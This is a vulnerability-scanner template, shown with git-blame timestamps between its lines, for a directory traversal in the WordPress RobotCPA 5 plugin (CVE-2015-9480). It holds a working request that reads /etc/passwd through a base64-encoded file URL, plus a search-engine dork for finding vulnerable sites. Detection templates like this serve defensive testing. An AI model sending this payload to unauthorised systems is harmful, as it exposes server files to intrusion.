2021-07-14 14:13:26 +00:00
|
|
|
id: CVE-2015-9480
|
|
|
|
|
|
|
|
info:
|
2022-04-21 21:16:41 +00:00
|
|
|
name: WordPress RobotCPA 5 - Directory Traversal
|
2021-07-14 14:13:26 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-14 14:13:26 +00:00
|
|
|
- https://www.exploit-db.com/exploits/37252
|
2022-04-21 21:16:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-9480
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2015-9480
|
|
|
|
cwe-id: CWE-22
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.25055
|
|
|
|
epss-percentile: 0.9605
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:*
|
2022-07-11 17:25:50 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: robot-cpa
|
|
|
|
product: robotcpa
|
2023-09-06 13:22:34 +00:00
|
|
|
framework: wordpress
|
|
|
|
google-query: inurl:"/wp-content/plugins/robotcpa"
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: wp-plugin,lfi,edb,cve,cve2015,wordpress
|
2021-07-14 14:13:26 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-14 14:13:26 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-07-14 14:13:26 +00:00
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-07-14 14:13:26 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|